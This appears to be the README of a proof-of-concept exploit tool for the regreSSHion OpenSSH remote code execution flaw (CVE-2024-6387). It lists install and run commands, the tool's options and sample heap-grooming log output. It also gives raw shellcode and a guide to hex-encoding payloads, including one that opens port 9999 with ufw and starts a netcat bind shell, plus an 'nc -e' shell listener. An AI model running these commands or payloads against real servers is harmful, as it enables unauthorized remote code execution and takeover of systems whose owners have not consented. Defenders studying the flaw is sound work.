Proof of concept python script for regreSSHion exploit. Version 0.2.1 build POC
git clone https://github.com/l-urk/CVE-2024-6387.git
cd CVE-2024-6387
pip3 install -r requirements.txt
python3 regreSSHion.py -h
🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script
usage: regreSSHion.py [-h] -i IP -p PORT [-t] [-c] [-d] [-r] [-x] [-y] [-z]
🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script
options:
-h, --help show this help message and exit
-i IP, --ip IP target SSH server IPv4 ( format: -i 0.0.0.0 )
-p PORT, --port PORT target SSH server port number ( format: -p 22 )
-t, --time ENABLE TIME displayed on all log output ( format: -t )
-c, --clear CLEAR SCREEN before running the exploit ( format: -c )
-d, --debug enable see the DEBUG LOGS output on run ( format: -d )
-r, --repeat enable to REPEAT EXPLOIT until RCE wins ( format: -r )
-x, --skipssh enable this to SKIP SSH HANDSHAKES ( format: -x )
-y, --skipheap enable this to SKIP HEAP and parse ( format: -y )
-z, --skipfinal enable this to SKIP FINAL ID CHECK ( format: -z )
🔒 Affected OpenSSH Versions: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8
🔒 contact: github.com/l-urk - x.com/l_urkk
To use the script, start python3 with regreSSHion.py
- Set the ip to the vulnerable SSH server IPv4 address
- Set the port to the vulnerable SSH server port number
python3 regreSSHion.py --ip 127.0.0.1 --port 22
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4
Let's say you make it all the way here in the script...
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.
If it says exploit verification success you have successfully delivered and executed your payload. The script will try a few times to succeed. I would suggest trying this on your own vulnerable SSH server until you get a feel for getting the success message.
2024-08-03 22:47:15,891 - ERROR - Exploitation failed.
Debug mode
- With debug mode enabled you will get a more verbose output, this will show you the received SSH version string, packet length information, and some other things, pretty much everything that's happening that could possibly be logged.
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug
Example Output:
2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...
The default shellcode uses ufw to open incoming port 9999 and starts a nc listening shell on port 9999
shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
You can make your own shellcode payload by using an ascii to hex editor, and manually converting it to shellcode. I use this ascii-to-hex website here: https://www.rapidtables.com/convert/number/ascii-to-hex.html
- Input your desired text for the shellcode.
- Use the settings "User defined" and "\x" in the input box.
- Replace all capital X's with lowecase x's
- Use notepad or another character replacement capable program.
- Move the last \x from the end to the start of the hex string.
- Add quotes to both ends for interpretation by the shell.
hello world
hello world
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
printf hello world
printf hello world
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
make test file
test > test
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"
Allow incoming connections on port 9999 & open a nc shell on port 9999
ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"
If you want to test out the exection of a shellcode payload you can use the send_socket.py script. Usage:
usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]
send shellcode to a target socket (ip and port)
options:
-h, --help show this help message and exit
-i IP, --ip IP target ip address (default: 127.0.0.1)
-p PORT, --port PORT target tcp socket port (default: 1111)
-s SHELLCODE, --shellcode SHELLCODE
shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)
Sender:
python3 send_socket.py -i 127.0.0.1 -p 1111
Listener:
- raw text interpretation
nc -lvp 1111
- shell execution
nc -lvp 1111 -e /usr/bin/bash